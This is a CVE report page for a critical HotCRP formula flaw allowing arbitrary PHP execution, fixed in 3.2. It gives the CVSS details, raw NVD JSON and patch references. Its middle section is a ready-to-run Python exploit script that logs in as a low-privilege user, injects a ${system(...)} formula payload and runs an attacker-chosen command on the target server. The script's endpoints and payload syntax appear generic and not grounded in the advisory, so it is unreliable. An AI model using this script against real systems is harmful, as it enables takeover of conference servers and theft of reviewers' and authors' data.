Security Vulnerability Report
中文
CVE-2026-23836 CVSS 9.9 CRITICAL

CVE-2026-23836

Published: 2026-01-19 18:16:06
Last Modified: 2026-02-18 16:01:01
Source: [email protected]

Description

HotCRP is conference review software. A problem introduced in April 2024 in version 3.1 led to inadequately sanitized code generation for HotCRP formulas which allowed users to trigger the execution of arbitrary PHP code. The problem is patched in release version 3.2.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hotcrp:hotcrp:*:*:*:*:*:*:*:* - VULNERABLE
HotCRP 3.1 (introduced April 2024, vulnerable)
HotCRP < 3.2 (affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23836 HotCRP Formula RCE PoC # Target: HotCRP version 3.1 (vulnerable) # Author: Security Research import requests import sys TARGET_URL = "http://target-hotcrp-server.com" LOGIN_URL = f"{TARGET_URL}/src/login.php" FORMULA_URL = f"{TARGET_URL}/src/api.php" def exploit_rce(target_url, username, password, command="id"): """Exploit CVE-2026-23836 - HotCRP Formula RCE""" session = requests.Session() # Step 1: Authenticate with low-privilege account login_data = { "email": username, "password": password, "action": "login" } resp = session.post(LOGIN_URL, data=login_data) if resp.status_code != 200: print("[-] Login failed") return None print("[+] Logged in successfully") # Step 2: Inject malicious formula payload # The vulnerability allows PHP code execution through formula input payload = f"${{system('{command}')}}" formula_data = { "do": "setformula", "formula": payload, "pid": "1" } resp = session.post(FORMULA_URL, json=formula_data) # Step 3: Trigger formula evaluation trigger_url = f"{TARGET_URL}/src/api.php?do=review&paper=1" resp = session.get(trigger_url) print(f"[+] Payload sent: {payload}") print(f"[+] Response status: {resp.status_code}") return resp.text if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_url> <username> <password> [command]") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] if len(sys.argv) > 4 else "id" result = exploit_rce(target, user, pwd, cmd) if result: print("[+] Exploitation attempted") print(result[:500])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23836", "sourceIdentifier": "[email protected]", "published": "2026-01-19T18:16:06.147", "lastModified": "2026-02-18T16:01:00.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HotCRP is conference review software. A problem introduced in April 2024 in version 3.1 led to inadequately sanitized code generation for HotCRP formulas which allowed users to trigger the execution of arbitrary PHP code. The problem is patched in release version 3.2."}, {"lang": "es", "value": "HotCRP es software de revisión de conferencias. Un problema introducido en abril de 2024 en la versión 3.1 llevó a una generación de código insuficientemente saneado para las fórmulas de HotCRP, lo que permitió a los usuarios desencadenar la ejecución de código PHP arbitrario. El problema está parcheado en la versión de lanzamiento 3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hotcrp:hotcrp:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0", "versionEndExcluding": "3.2", "matchCriteriaId": "B96A133C-9FF9-4749-9340-E21E8FBB2A13"}]}]}], "references": [{"url": "https://github.com/kohler/hotcrp/commit/4674fcfbb76511072a1145dad620756fc1d4b4e9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kohler/hotcrp/commit/bfc7e0db15df6ed6d544a639020d2ce05a5f0834", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kohler/hotcrp/security/advisories/GHSA-hpqh-j6qx-x57h", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.